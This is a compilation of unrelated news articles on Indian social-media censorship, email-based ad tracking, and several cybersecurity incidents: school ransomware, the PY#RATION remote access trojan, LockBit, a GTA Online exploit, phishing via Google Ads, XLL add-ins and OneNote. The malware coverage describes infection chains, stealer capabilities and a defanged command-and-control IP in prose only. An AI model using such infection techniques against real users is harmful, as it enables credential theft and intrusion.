The response by the Indian government was quick and draconian. Days after a BBC documentary examining the role that Narendra Modi, now prime minister, had played in 2002 communal riots in Gujarat was released, the information ministry announced that all links to the footage were to be banned on social media.

Emergency laws brought in by the Modi government just two years ago were used to enforce the ban.

Both Twitter and YouTube quickly complied with the government’s censorship requests. Posts on about 50 Twitter accounts were removed, with activists, politicians and even Hollywood actors among those affected, as well as an unspecified number of YouTube channels. Widely shared clips of the documentary, which alleged that Modi, in his role as chief minister of Gujarat at the time, had enabled and then did nothing to stop the violence in which almost 1,000 Muslims were killed, quickly disappeared from Indian social media.

It is not the first time the Modi government has used the 2021 information technology rules to censor online content critical of the administration. However, the action taken over the BBC documentary is among the most high-profile use of the legislation and sheds light on the fragile and fractious place that social media such as Twitter now occupy in India and directly pits the vow of the platform’s new billionaire owner, Elon Musk, to be a “free speech absolutist” against increasingly authoritarian laws governing the country’s online sphere.

Widely criticised by human rights groups and digital activists, the 2021 IT rules give the government power to remove any content it deems to threaten “the unity, integrity, defence, security or sovereignty of India”.

Even before the passing of the legislation, legal demands made by the Modi government to remove content from Twitter increased by 48,000% between 2014 and 2020, according to analysis of the company’s transparency reports.

The two-part BBC series documenting the rise of Modi has proved highly controversial in India, despite it only being released in the UK, prompting allegations from the Indian foreign ministry that it was “biased propaganda” that showed a “blatant colonial mindset”.

Kanchan Gupta, a spokesperson for the information ministry, called the documentary “hostile propaganda and anti-India garbage” and students who arranged a screening at a university in Kerala this week were accused of being “treasonous”. At Delhi’s prestigious Jawaharlal Nehru University, students who tried the same were hit with an electricity and internet blackout, and had stones thrown at them by others from rightwing groups.

The BBC has said its documentary was “rigorously researched according to highest editorial standards”.

Many have cited their compliance with the online censorship of the documentary as an example of how Twitter and YouTube are helping to further erode freedom of speech in India, in order to appease the Modi government and not compromise access to the vast and increasingly online Indian population. There are over 40 million Twitter users in India, making it their third largest market after Japan and the US.

“This use of an emergency law as a censorship mechanism is a very worrying development but it’s far from the first time this has happened,” said Prateek Waghre, the policy director at the advocacy group the Internet Freedom Foundation in India. According to a statement to parliament in July, action was taken against 94 YouTube channels, 19 social media accounts and 747 URLs on the government’s request since the IT rules were passed.

Elon Musk ‘entering Twitter HQ’. Photograph: @elonmusk / Twitter

Before Musk’s takeover, Twitter had pushed back – though somewhat inconsistently – against the Modi government’s increasingly heavy-handed approach towards social media. Twitter had restored some of the accounts the administration had demanded the removal of and in July last year filed a lawsuit in Indian courts alleging New Delhi had abused its power by ordering the company to arbitrarily and disproportionately take down accounts belonging to government critics.

Twitter still reports all the posts and accounts it removes at the request of the Indian government to the online database Lumen. YouTube, however, does not.

Yet for all his protestations to be a crusader for free speech, there are indicators that Musk’s Twitter might be far less bullish in standing up to the Modi government. When Musk was trying to back out of the deal to buy the platform, he made it clear in the court filings that he was unhappy with the lawsuit against the Indian government, saying he believed moderation should “hew close to the laws of countries in which Twitter operates”.

Among the Indian accounts that have been reinstated since Musk took over is that of Kangana Ranaut, a fiercely pro-Modi actor who has espoused anti-Muslim sentiments and was suspended in 2021 for posts that were seen as a call to violence against minorities.

On taking over, he has not mentioned the lawsuit once but did fire almost all 200 of Twitter’s employees in India. Separately, Musk’s car company, Tesla, is lobbying India’s government to reduce import taxes on electric vehicles so it can have access to the lucrative Indian market.

Waghre said Musk’s position on championing free speech on Twitter, already wildly inconsistent, was likely to be “severely tested in India”, as the furore around the BBC documentary had proven.

“We’re talking about pressures on freedom of speech in the world’s largest democracy,” Waghre said. “Musk’s pledge has rung hollow everywhere, but in India the impact will certainly be larger.”

Source

They immediately took action to shut down the network and began investigating the possible breach. As part of that protocol, they alerted the Indiana Department of Education and the FBI / Department of Homeland Security.

As they continued investigation, they confirmed that the corporation had been subject to a ransomware attack that impacted all of their windows-based computers, servers, and other technology systems.

This caused significant disruption to daily operations but the teachers, staff and students were great as they have adapted to the challenging circumstances.

At this time, they do not believe student and employee information and data systems are impacted as they are not located on local servers.

As we look to the future,  technology staff will be working around the clock to rebuild our servers and get their systems back up and running.

They anticipate that over the next several days they will continue to experience some disruptions to our internet-based systems.

There does not appear to be an impact on student Chromebooks and those should function as normal when they bring them home.

The corporation extends thanks to their dedicated technology staff as they work through this challenging situation. They also want to thank their students and Wawasee staff for being flexible and shifting plans when necessary.

They appreciate the continued support and patience as they rebuild their systems and get their network back online. They remain committed to keeping all Wawasee families informed throughout this process. Updates will be made as new information is collected.

Source

When you browse the web, an increasing number of sites and apps are asking for a piece of basic information that you probably hand over without hesitation: your email address.

It may seem harmless, but when you enter your email, you’re sharing a lot more than just that. I’m hoping this column, which includes some workarounds, persuades you to think twice before handing over your email address.

First, it helps to know why companies want email addresses. To advertisers, web publishers and app makers, your email is important not just for contacting you. It acts as a digital bread crumb for companies to link your activity across sites and apps to serve you relevant ads.

If this all sounds familiar, that’s because it is.

For decades, the digital advertising industry relied on invisible trackers planted inside websites and apps to follow our activities and then serve us targeted ads. There have been sweeping changes to this system in the past few years, including Apple’s release of a software feature in 2021 allowing iPhone users to block apps from tracking them and Google’s decision to prevent websites from using cookies, which follow people’s activities across sites, in its Chrome browser by 2024.

Advertisers, web publishers and app makers now try to track people through other means — and one simple method is by asking for an email address.

Imagine if an employee of a brick-and-mortar store asked for your name before you entered. An email address can be even more revealing, though, because it can be linked to other data, including where you went to school, the make and model of the car you drive, and your ethnicity.

“I can take your email address and find data you may not have even realized you’ve given to a brand,” said Michael Priem, the chief executive of Modern Impact, an advertising firm in Minneapolis. “The amount of data that is out there on us as consumers is literally shocking.”

Advertising tech is continuing to evolve, so it helps to understand what exactly you’re sharing when you enter in an email address. From there, you can decide what to do.

Your email address has become a potent piece of data.

For many years, the digital ad industry has compiled a profile on you based on the sites you visit on the web. Information about you used to be collected in covert ways, including the aforementioned cookies and invisible trackers planted inside apps. Now that more companies are blocking the use of those methods, new ad targeting techniques have emerged.

One technology that is gaining traction is an advertising framework called Unified ID 2.0, or UID 2.0, which was developed by the Trade Desk, an ad-technology company in Ventura, Calif.

Say, for example, you are shopping on a sneaker website using UID 2.0 when a prompt pops up and asks you to share your email address and agree to receive relevant advertising. Once you enter your email, UID 2.0 transforms it into a token composed of a string of digits and characters.

That token travels with your email address when you use it to log in to a sports streaming app on your TV that uses UID 2.0. Advertisers can link the two accounts together based on the token, and they can target you with sneaker ads on the sports streaming app because they know you visited the sneaker website.

Since your email address is not revealed to the advertiser, UID 2.0 may be seen as a step up for consumers from traditional cookie-based tracking, which gives advertisers access to your detailed browsing history and personal information.

“Websites and apps are increasingly asking for email authentication in part because there needs to be a better way for publishers to monetize their content that’s more privacy-centric than cookies,” Ian Colley, the chief marketing officer of the Trade Desk, said in an email. “The internet is not free, after all.”

However, in an analysis, Mozilla, the nonprofit that makes the Firefox web browser, called UID 2.0 a “regression in privacy” because it enabled the type of tracking behavior that modern web browsers were designed to prevent.

There are simpler ways for websites and apps to track your web activity through your email address. An email could contain your first and last name, and assuming you’ve used it for some time, data brokers have already compiled a comprehensive profile on your interests based on your browsing activity. A website or an app can upload your email address into an ad broker’s database to match your identity with a profile containing enough insights to serve you targeted ads.

The bottom line is that if you’re wondering why you are continuing to see relevant ads despite the rise of privacy tools that combat digital tracking, it’s largely because you are still sharing your email address.

So what to do?

There are various options for limiting the ability of advertising companies to target you based on your email address:

• Create a bunch of email addresses. Each time a site or an app asks for your email, you could create a unique address to log in to it, such as, for example, netflixbrianchen@gmail.com for movie-related apps and services. That would make it hard for ad tech companies to compile a profile based on your email handle. And if you receive spam mail to a specific account, that will tell you which company is sharing your data with marketers. This is an extreme approach, because it’s time-consuming to manage so many email addresses and their passwords.

• Use email-masking tools. Apple and Mozilla offer tools that automatically create email aliases for logging in to an app or a site; emails sent to the aliases are forwarded to your real email address. Apple’s Hide My Email tool, which is part of its iCloud+ subscription service that costs 99 cents a month, will create aliases, but using it will make it more difficult to log in to the accounts from a non-Apple device. Mozilla’s Firefox Relay will generate five email aliases at no cost; beyond that, the program charges 99 cents a month for additional aliases.

• When possible, opt out. For sites using the UID 2.0 framework for ad targeting, you can opt out by entering your email address at https://transparentadvertising.org. (Not all sites that collect your email address are using UID 2.0, however.)

You could also do nothing. If you enjoy receiving relevant advertising and have no privacy concerns, you can accept that sharing some information about yourself is part of the transaction for receiving content on the internet.

I try to take a cautious but moderate approach. I juggle four email accounts devoted to my main interests — food, travel, fitness and movies. I’ll use the movie-related email address, for example, when I’m logging in to a site to buy movie tickets or stream videos. That way, those sites and apps will know about my movie preferences, but they won’t know everything about me.

Source

Named PY#RATION by researchers at threat analytics company Securonix, the new RAT uses the WebSocket protocol to communicate with the command and control (C2) server and to exfiltrate data from the victim host.

A technical report from the company analyzes how the malware works. The researchers note that the RAT is actively developed as they've seen multiple versions of it since August when the PY#RATION campaign started.

Distribution via shortcut files

The PY#RATION malware is distributed via a phishing campaign that uses password-protected ZIP file attachments containing two shortcut .LNK files disguised as images, namely front.jpg.lnk and back.jpg.lnk.

The two LNK files that fetch the two batch files (Securonix)

 

When launched, the shortcuts victim sees the front an back of a driver's license. However, malicious code is also executed to contact the C2 (Pastebin in later attacks) and download two .TXT files ('front.txt' and 'back.txt') which are eventually renamed to BAT files to accommodate the malware execution.

Upon launch, the malware creates the 'Cortana' and 'Cortana/Setup' directories in the user's temporary directory and then downloads, unpacks, and runs additional executable files from that location.

Persistence is established by adding a batch file ('CortanaAssist.bat') into the user's startup directory.

The use of Cortana, Microsoft's personal assistant solution on Windows, aims at disguising the malware entries as system files.

The campaign's complete infection chain (Securonix)

Stealthy PY#RATION RAT

The malware delivered to the target is a Python RAT packed into an executable using automated packers like 'pyinstaller' and 'py2exe,' which can convert Python code into Windows executables that include all the libraries required for its execution.

This approach results in an inflated payload sizes, with version 1.0 (initial) being 14MB, and version 1.6.0 (latest) being 32MB. The more recent version is bigger because it features additional code (+1000 lines) and a layer of fernet encryption.

This helps the malware evade detection, and according to Securonix's tests, version 1.6.0 of the payload deployed undetected by all but one antivirus engine on VirusTotal.

While Securonix did not share the hash of the malware samples, BleepingComputer was able to find the following file that appears to be from this campaign:

Detection rate for Py#Ration RAT (BleepingComputer)

Securonix's analysts extracted the payload's contents and examined the code functions using the 'pyinstxtractor' tool to determine the capabilities of the malware.

Extracted components from the executable (Securonix)

 

Among the features seen in version 1.6.0 of the PY#RATION RAT are the following:

• Perform network enumeration
• Perform file transfers from the breached system to the C2, or vice versa
• Perform keylogging to record the victim's keystrokes
• Execute shell commands
• Perform host enumeration
• Extract passwords and cookies from web browsers
• Steal data from the clipboard
• Detect anti-virus tools running on the host

Stealing data from Chrome, Brave, Opera, and Edge browsers (Securonix)

 

Securonix researchers say that the malware "leverages Python's built-in Socket.IO framework, which provides features to both client and server WebSocket communication." This channel is used for both communication and data exfiltration.

The advantage of WebSockets is that the malware can simultaneously receive and send data from and to the C2 over a single TCP connection using ports commonly left open in networks like 80 and 443.

The analysts noticed that the threat actors used the same C2 address ("169[.]239.129.108") throughout their campaign, from malware version 1.0 to 1.6.0.

According to the researchers, the IP has not been blocked on the IPVoid checking system, indicating that PY#RATION has gone undetected for several months.

At the moment details about specific campaigns using this piece of malware and its targets, distribution volume, and the operators behind it remain unclear.

Securonix has published a separate post where they list IoCs (indicators of compromise) for the PY#RATION campaign.

Source

The report said that 20% of brand phishing attempts imitated Yahoo. This is reportedly a result of phishing campaigns wherein cybercriminals sent emails containing the subject "Yahoo Award" and senders like "Award Promotion," "Award Center," "Info winning," or "Award Winning."

The email's content informed recipients that they had won hundreds of thousands of dollars courtesy of Yahoo. To be able to claim this, however, they had to send their personal information and banking details — an obvious ruse to steal the victim's sensitive data. The email even goes as far as telling recipients not to tell people about winning the prize due to legal issues.

DHL is the second most impersonated brand in Check Point's report at 16% , while Microsoft holds the third spot at 11%. Other brands that made the list include Google, LinkedIn, WeTransfer, Netflix, FedEx, HSBC, and WhatsApp.

Finally, the study found that technology was the industry most likely to be imitated by phishers in 4Q'22, followed by shipping and social networks.

To protect yourself from phishing attacks, always be cautious when opening links or downloading attachments from unsolicited emails as they could contain malware. Also, make it a habit to check the URL of the site you're on. For instance, if the URL doesn't start with yahoo.com, then it's likely fraudulent. Lastly, enable two-factor authentication if available to ensure that threat actors will not be able to infiltrate your account even if you accidentally give them your username and password.

Source: Check Point Security

Yahoo was the most phished brand of 4Q'22, according to research

One of the most prolific ransomware groups ever, the LockBit collective has attempted to maintain a low profile in spite of its volume of attacks.

But as it has grown, the group has gotten more aggressive and perhaps careless. Earlier this month, the LockBit malware was notably used in an attack on the United Kingdom’s Royal Mail that hobbled operations. After other recent visible attacks, like one on a Canadian children’s hospital, all eyes are now on LockBit.   

“They are the most notorious ransomware group, because of sheer volume. And the reason for their success is that the leader is a good businessman,” says Jon DiMaggio, chief security strategist at Analyst1 who has studied LockBit’s operations extensively. “It’s not that he’s got this great leadership capability. They made a point-and-click ransomware that anyone could use, they update their software, they’re constantly looking for user feedback, they care about their user experience, they poach people from rival gangs. He runs it like a business, and because of that, it is very, very attractive to criminals.”

Keep It Professional

For the Royal Mail, LockBit was a chaos agent. On January 11, the UK postal service’s international shipping ground to a halt after being hit with a cyberattack. For more than a week, the company has told customers not to send new international parcels—adding further disorganization after workers went on strike over pay and conditions. The attack was later linked to LockBit.

Just before Christmas, a LockBit member attacked the SickKids hospital in Canada, impacting its internal systems and phone lines, causing delays to medical images and lab tests. The group quickly backtracked after the attack, providing a free decryptor and saying it had blocked the member responsible. In October, LockBit also demanded an unusually high $60 million payment from a UK car dealership chain.

Adding to its infamy, LockBit is also one of the most prolific and aggressive ransomware groups when it comes to targeting manufacturing and industrial control systems. Security firm Dragos estimated in October that in the second and third quarters of 2022, the LockBit malware was used in 33 percent of ransomware attacks on industrial organizations and 35 percent of those against infrastructure.

In November, the US Department of Justice reported that LockBit’s ransomware has been used against at least 1,000 victims worldwide, including in the United States. “LockBit members have made at least $100 million in ransom demands and have extracted tens of millions of dollars in actual ransom payments from their victims,” the Justice Department wrote. The FBI first began investigating the group in early 2020. In February 2022, the agency released an alert warning that LockBit “employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense.”

LockBit emerged at the end of 2019, first calling itself “ABCD ransomware.” Since then, it has grown rapidly. The group is a “ransomware-as-a-service” operation, meaning that a core team creates its malware and runs its website while licensing out its code to “affiliates” who launch attacks.

Typically, when ransomware-as-a-service groups successfully attack a business and get paid, they’ll share a cut of the profits with the affiliates.

In the case of LockBit, Jérôme Segura, senior director of threat intelligence at Malwarebytes, says the affiliate model is flipped on its head.

Affiliates collect payment from their victims directly and then pay a fee to the core LockBit team. The structure seemingly works well and is reliable for LockBit. “The affiliate model was really well ironed out,” Segura says.

Though researchers have repeatedly seen cybercriminals of all sorts professionalizing and streamlining their operations over the past decade, many prominent and prolific ransomware groups adopt flamboyant and unpredictable public personas to garner notoriety and intimidate victims. In contrast, LockBit is known for being relatively consistent, focused, and organized.

“Of all the groups, I think they have probably been the most businesslike, and that is part of the reason for their longevity,” says Brett Callow, a threat analyst at the antivirus company Emsisoft. “But the fact that they post a lot of victims on their site doesn’t necessarily equate to them being the most prolific ransomware group of all, as some would claim. They are probably quite happy with being described that way, though. That’s just good for recruitment of new affiliates.”

The group certainly isn’t all hype, though. LockBit seems to invest in both technical and logistical innovations in an attempt to maximize profits. Peter Mackenzie, director of incident response at security firm Sophos, says, for example, that the group has experimented with new methods for pressuring its victims into paying ransoms.

“They've got different ways of paying,” Mackenzie says. “You could pay to have your data deleted, pay to have it released early, pay to extend your deadline,” Mackenzie says, adding that LockBit opened its payment options to anyone. This could, theoretically at least, result in a rival company buying a ransomware victim’s data. “From the victim's perspective, it's extra pressure on them, which is what helps make people pay,” Mackenzie says.

Since LockBit debuted, its creators have spent significant time and effort developing its malware. The group has issued two big updates to the code—LockBit 2.0, released in mid-2021, and LockBit 3.0, released in June 2022. The two versions are also known as LockBit Red and LockBit Black, respectively. Researchers say the technical evolution has paralleled changes in how LockBit works with affiliates. Prior to the release of LockBit Black, the group worked with an exclusive group of 25 to 50 affiliates at most. Since the 3.0 release, though, the gang has opened up significantly, making it harder to keep tabs on the number of affiliates involved and also making it more difficult for LockBit to exercise control over the collective.

LockBit frequently expands its malware with new features, but above all, the malware’s characteristic trait is that it's simple and easy to use. At its core, the ransomware has always offered anti-detection capabilities, tools for circumventing Microsoft Windows defenses, and features for privilege escalation within a compromised device. LockBit uses publicly available hacking tools when it can, but it also develops custom capabilities. The 2022 FBI report noted that the group sometimes uses previously unknown or zero day vulnerabilities in its attacks. And the group has the capability to target many different types of systems.

“It's not just Windows. They'll attack Linux, they'll go after your virtual host machines,” Mackenzie says. “They offer a solid payment system.

There's a lot of backend infrastructure that comes with this. It's just a well-made product, unfortunately.” In October, it was reported that LockBit’s malware was deployed after a zero day was used to hack Microsoft Exchange servers—a relatively rare occurrence when it comes to ransomware gangs.

“Theer are additional features that make the ransomware more dangerous—for example, having worm components to it,” Segura adds. “They've also discussed things like doing denial-of-service attacks against victims, in addition to the extortion.”  

With the release of LockBit 3.0, the group also signaled its intention to evolve. It introduced the first ransomware bug bounty scheme, promising to pay legitimate security researchers or criminals who could identify flaws in its website or encryption software. LockBit said it would pay anyone $1 million if they could name who is behind LockBitSupp, the public persona of the group.

The core members at the top of LockBit seem to include its leader and one or two other trusted partners. Analyst1’s DiMaggio, who has tracked the actors for years, notes that the group claims to be based in the Netherlands. Its leader has said at various times that he personally operates out of China or even the United States, where he has said he is a part owner of two restaurants in New York City. LockBit members all seem to be Russian-speaking, though, and DiMaggio says that while he cannot be certain, he believes the group is based in Russia.

“The leader doesn’t seem to have any concern about being arrested. He thinks he’s a supervillain, and he plays the part well,” DiMaggio says. “But I do believe he has a healthy concern that if the Russian government were to get their hooks in him, he would have to make the decision to turn over most of his money to them or do work for them like helping them with the Ukraine war.”

Beware the Spotlight

Despite LockBit’s relative professionalism, the group has, at times, slipped into showboating and bizarre behavior. During desperate efforts to get attention—and attract affiliates—in its early months, the criminal group held an essay-writing competition and paid prizes to the winners. And in September 2022, the group memorably posted a message on a cybercrime forum claiming it would pay anyone $1,000 if they got the LockBit logo tattooed on themselves. Around 20 people shared photos and videos with their feet, wrists, arms, and chests all branded with the cybercrime gang’s logo.

LockBit’s meteoric rise and recent attacks against high-profile targets could ultimately be its downfall, though. Notorious ransomware groups have been infiltrated, exposed, and disrupted in recent years. Before Russia’s full-scale invasion of Ukraine in February 2022, the Russian Federal Security Service (FSB) arrested high-profile REvil hackers, although the group has since returned. Meanwhile, the US military hacking unit Cyber Command has admitted to disrupting some ransomware groups. And a Ukrainian cybersecurity researcher contributed to the downfall of the Conti ransomware brand last year after infiltrating the group and publishing more than 60,000 of the group’s internal chat messages.

These deterrent actions appear to be having some impact on the overall ransomware ecosystem. While it is difficult to determine real totals of how much money ransomware actors take in, researchers who track cybercriminal groups and those who specialize in cryptocurrency tracing have noticed that ransomware gangs seem to be taking in less money as government enforcement actions impede their operations and more victims refuse to pay.

The screws are already turning on LockBit. An apparently disgruntled LockBit developer leaked its 3.0 code in September, and Japanese law enforcement has claimed it can decrypt the ransomware. US law enforcement is closely watching the group as well, and its recent attacks can only have raised its profile. In November 2022, the FBI revealed that an alleged LockBit affiliate, Mikhail Vasiliev, 33, had been arrested in Canada and would be extradited to the US. At the time, deputy attorney general Lisa O. Monaco said officials had been investigating LockBit for more than two and a half years.

“I think LockBit is going to have a rough year this year and potentially see their numbers go down,” Analyst1’s DiMaggio says. “They are under a lot of scrutiny now, and they also may have lost their main developer, so they could have development issues that bite them in the ass. It’ll be interesting to see. These guys don’t care about anyone or anything.”

LockBit has seemingly been so dangerous and prolific because it maintained standards for the types of targets its affiliates could hit and avoided attracting too much attention while casting a wide net. But times have changed, and shutting down the UK’s international mail exports for more than a week isn’t exactly keeping a low profile.

“They do have a bit of a PR problem when it comes to their affiliates at this point, because they obviously can't seem to handle them very well,” Malwarebytes’ Segura says. “The bragging, hitting some pretty critical infrastructure, and high-visibility targets is a very dangerous game they're playing. LockBit has a big target on its back right now.”

Source

GTA Online is the multiplayer spin of the popular action-adventure game series by Rockstar Games, initially released in October 2013, with new content being added to it through free title updates.

Reportedly, a new "remote code execution" vulnerability in the PC game client was abused by the developer of the 'North' Grand Theft Auto V cheat to remotely change player's account attributes (like zero their money balance), corrupt accounts, and even ban players from the game.

According to the user reports, the exploit can impact even players not in the same multiplayer lobby as the attackers, so anyone, as long as they're online, is susceptible to attacks.

According to a changelog seen by BleepingComputer, the North GTA Online cheat developer added these new "features on January 20th, 2023, as part of its 2.0.0 release.

GTA Online Cheat command list
Source: BleepingComputer

 

This alleged vulnerability has received a CVE and is being tracked under CVE-2023-24059. 

The developer of the North GTA Online cheat removed these abusive features on January 21st, apologizing for the mayhem it has caused.

"Removed badsport/corrupt account for players (bad judgement on my part for adding this public)," reads a changelog for the North cheat.

"Removed take money from player (bad judgement on my part for adding this public)."

Unfortunately, the reversal comes too late, as the issue has already affected many gamers.

The Rockstar Games' support forums have been flooded by user reports claiming to have experienced account problems since the cheat's release.

Rockstar Games support forums on Monday morning
(BleepingComputer)

Not safe to play on a PC

While Rockstar Games has not issued an official announcement on the situation yet, developers and those in this space claim that the exploit is a "partial remote code execution" flaw and could extend to breaching not only GTA Online accounts but also the security of the computer running the game.

A Twitter user, Tez2, who closely follows Rockstar Games, stated that users should avoid playing the game without a firewall rule, or better, not play it at all.

A temporary fix for corrupted accounts that seems to have worked for some players is to delete the "Rockstar Games" folder from the Windows Documents folder and then reload the game to refresh profile data. 

BleepingComputer has not tested this method, so proceed at your own risk.

Speyedr, the developer of a custom GTA V firewall tool named 'Guardian,' has warned that attackers are on the verge of finding a complete remote code execution pathway for the newly emerged exploits.

However, Speyer warned that Guardian needs to be configured correctly to protect users against the exploit and advises that Windows users not play the game until the bug is fixed.

"Just to reassure everyone--Guardian still works, and this new exploit doesn't somehow bypass Guardian," tweeted Speyedr.

HOWEVER, the chance of any user (especially beginners) setting up Guardian incorrectly in a way that doesn't protect them is too high for such a dangerous exploit."

BleepingComputer has contacted Rockstar Games to comment on these issues, but we are still waiting to hear back from the game publisher.

Until there's an official fix for the issues by Rockstar Games, it would be advisable to avoid launching the game on PC, especially if you have logged significant progress or have spent a lot of money on it.

Source

This bug is tracked as CVE-2022-42856, and it stems from a type confusion weakness in Apple's Webkit web browser browsing engine.

Apple said that the flaw discovered by Clément Lecigne of Google's Threat Analysis Group allows maliciously crafted webpages to perform arbitrary code execution (and likely gain access to sensitive information) on vulnerable devices.

Attackers can successfully exploit this flaw by tricking their targets into visiting a maliciously crafted website under their control.

Once achieved, arbitrary code execution could allow them to execute commands on the underlying operating system, deploy additional malware or spyware payloads, or trigger other malicious activity.

In a security advisory published today, Apple once again said that they're aware of reports that this security flaw "may have been actively exploited."

The company addressed the zero-day bug with improved state handling for the following devices: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation).

Secure older devices to block attacks

Although Apple disclosed that it received reports of active exploitation, the company is yet to publish info regarding these attacks.

By withholding this info, Apple is likely aiming to allow as many users as possible to patch their devices before other attackers pick up on the zero-day's details and start deploying custom exploits targeting vulnerable iPhones and iPads.

Even though this security flaw was most likely only used in targeted attacks, it's still strongly recommended to install today's security updates as soon as possible to block potential attack attempts.

CISA added the zero-day to its list of known exploited vulnerabilities on December 14, requiring Federal Civilian Executive Branch (FCEB) agencies to patch it to secure them "against active threats."

Today, Apple also patched dozens of other security flaws in its Safari web browser and its latest macOS, iOS, and watchOS versions.

Source

The Google Ads platform allows advertisers to create advertising campaigns on publisher partner's web sites and in Google search results.

The recently seen widespread campaign involves threat actors using the Google Ads admin interface to send bulk email invitations that, coming from Google, bypass recipient spam filters.

Careful with that invite!

Users around the world are reporting receiving emails from authentic Google Ads accounts that are catching their attention.

These bogus invite emails, sent from Google's servers entice users to visit spam links contained in the email message.

"The mail is sent from official Google address 'Google Ads ads-account-noreply@google.com'" writes Redditor erohtar.

"Few weeks back my boss gave me access to the company's Google Ads account, so I'm familiar with this email. It's legit, actually sent by Google, and it WILL give me access to the scammer's Google Ads account."

Many others have reported receiving identical emails leaving them frustrated:

"I've been trashing the emails but it would be nice if Google would get a handle on their products so their users aren't having to constantly guard against phishing scams," commented Brandon on a Google community forum thread started by another affected person.

Websites promote adult content

Google Ads account administrators can use the "invitations" feature to add new users to the account admin interface via email invites.

But, it looks like clever threat actors have yet again found a way to misuse the feature for their nefarious activities.

The URLs contained in these invite emails ultimately redirected users to dodgy websites pushing adult dating sites, with many appear to be designed to collect personal information from visitors.

It might be tempting to report these emails as spam or phishing but that isn't the solution. Doing so may also block legitimate emails being sent from Google.

To better understand the issue and how Google plans on remedying it, BleepingComputer emailed Google well in advance of publishing. A spokesperson acknowledged our request and we are awaiting further response.

In the meantime, users should be on the lookout and refrain from clicking links or attachments within emails even if these emails appear to or in fact originate from authentic Google servers.

Source

This will help tackle the rise of malware campaigns abusing this infection vector to an ever-growing extent during the last several years.

"In order to combat the increasing number of malware attacks in recent months, we are implementing measures that will block XLL add-ins coming from the internet," Redmond says.

Microsoft says the new feature will reach general availability in multi-tenants worldwide in March for desktop users in the Current, Monthly Enterprise, and Semi-Annual Enterprise channels.

Excel XLL files are dynamic-link libraries (DLLs) used to extend the functionality of Microsoft Excel by providing additional features, such as custom functions, dialog boxes, and toolbars.

Attackers are using XLL add-ins in phishing campaigns to push various malicious payloads in the form of download links or attachments camouflaged as documents from trusted entities such as business partners or as fake advertising requests, holiday gift guides, and website promotions.

Once the target double clicks on an unsigned XLL file to open it, they will be warned of "a potential security content," that "add-ins might contain viruses or other security hazards," and prompted to enable the add-in for the current session.

If the add-in is activated (and many people ignore Office alerts without giving them a second glance), it will also deploy a malware payload on the victim's device in the background.

As XLL files are executables and attackers can use them to run malicious code on your computer, you must only open one if you're 100% sure it comes from a trusted source.

Additionally, such files are not generally sent as email attachments but instead installed by a Windows admin. Therefore, if you receive an email or any other message pushing such files, delete the message and report it as spam.

As Cisco Talos said in a January report, XLLs are now used by both financially-motivated attackers and state-backed threat groups (APT10, FIN7, Donot, TA410) as an infection vector to deliver first-stage payloads onto their targets' devices.

"Even if XLL add-ins existed for some time, we were not able to detect their usage by malicious actors until mid-2017 when some APT groups started using them to implement a fully functional backdoor," Cisco Talos said.

"We also identified that their usage significantly increased over the last two years as more commodity malware families adopted XLLs as their infection vector."

One year ago, HP's threat analyst team reported seeing a "near-sixfold surge in attackers using Excel add-ins (.XLL)" as part of its Threat Insights Report Q4 2021.

This is part of a broader effort to block threat actors from using malicious Office documents to deliver and install malware on their targets' computers.

Since July 2022, Microsoft said Office VBA macros would be auto-blocked in downloaded Office documents, making it harder to enable in docs downloaded from the Internet in several Office apps (Access, Excel, PowerPoint, Visio, and Word).

In March 2021, the company added XLM macro protection in M365 by expanding the runtime defense provided by Office 365's integration with Antimalware Scan Interface (AMSI) to include Excel 4.0 (XLM) macro scanning.

Redmond started disabling Excel 4.0 (XLM) macros by default when opened in Microsoft 365 tenants in January 2021.

Years before, in 2018, Microsoft also extended support for AMSI to Office 365 apps to defend customers against attacks using VBA macros.

Microsoft plans to kill malware delivery via Excel XLL add-ins

Microsoft is aware of this behavior by threat actors, so they eventually blocked macros in Office documents by default. However, cybercriminals are now using another app to trick users into infecting their own PCs with malware: digital note-taking app OneNote.

As reported by BleepingComputer, cybercriminals have been found sending phishing emails that purportedly contain DHL invoices, remittance forms, shipping notifications and documents, and mechanical drawings. Instead of using macros, which OneNote does not support, cybercriminals are exploiting OneNote's ability to attach files within a notebook.

They do this by attaching malicious VBS files onto a OneNote notebook. When double-clicked, these files automatically download and install malware from a remote site. To conceal them and make the OneNote document look as legitimate as possible, threat actors overlay a "Double click to view file" box over them.

Behind that "Double Click to View File" button are the malicious files.

This means that clicking on the box will launch the malicious files, which will install malware onto the device. And while OneNote will warn users that opening attachments could harm the user's computer and data, many users might just ignore the warning and click "OK" anyway.

In the emails seen by BleepingComputer, the malicious OneNote documents typically install remote access trojans that can steal sensitive information and cryptocurrency wallets. Others can even take screenshots and record video using the victim's webcam.

To protect yourself from these attacks, do not open unsolicited emails from people you do not know. Also, make sure that your antivirus software is updated so it can properly detect malware and remove it from your system.

Source and images: BleepingComputer

Cybercriminals are now exploiting OneNote to spread malware

From the most basic 'you've won a prize' scams to the most advanced espionage campaigns, attacks targeting out inboxes are successful again and again.

There's a reason cyber criminals and hackers continue to send millions of phishing emails.

Because, no matter whether you're working from the office or working remotely from home, email still plays a vital part in our working day. Sure, there's now a place for Slack, or Zoom, or Microsoft Teams, or whatever overlay of productivity software you are expected to use.

But for most people, getting stuff done still comes down to email.

The strengths of email: anyone can email you, and add all sorts of attachments. The weaknesses of email: anyone can email you and add all sorts of attachments. That makes it one of the most powerful productivity tools around - and a big source of risk.

Most of us are still dealing with email overload (now we also have overload via all those other communications tools, too). That means you are still potentially looking at - and trying to respond to - hundreds of messages from colleagues, clients or anyone else you do business with, every day.

But how long do you spend looking at those emails; are they really who they say they're from?

Cyber criminals know that our time is tight and we're not going to have a chance to carefully analyse every message which reaches our inbox –  one of the reasons why phishing is still so successful.

And they're using it for all manner of malicious campaigns; from tricking us into clicking fake – but convincing – links asking us to enter our username and password, convincing us to make urgent financial transfers, to duping us into downloading malware or ransomware from malicious attachments, phishing continues to be an effective weapon in the hackers' cyber arsenal.  

Some scoff at how phishing emails are still such an effective attack tool; sometimes they outright blame the victim for opening the spam email and following the instructions – but blaming the victim is wrong.

For a start, if anti-virus software and spam filters were being used and implemented correctly, in most cases, there's far less chance of malicious emails landing in people's corporate inboxes in the first place – that's a technology problem, not a people problem.

But in addition it's become incredibly difficult for us to process and separate spam emails from everything else which lands in our inbox, especially, when for many of us, so many of those emails relate to office admin – and cyber crooks know it.

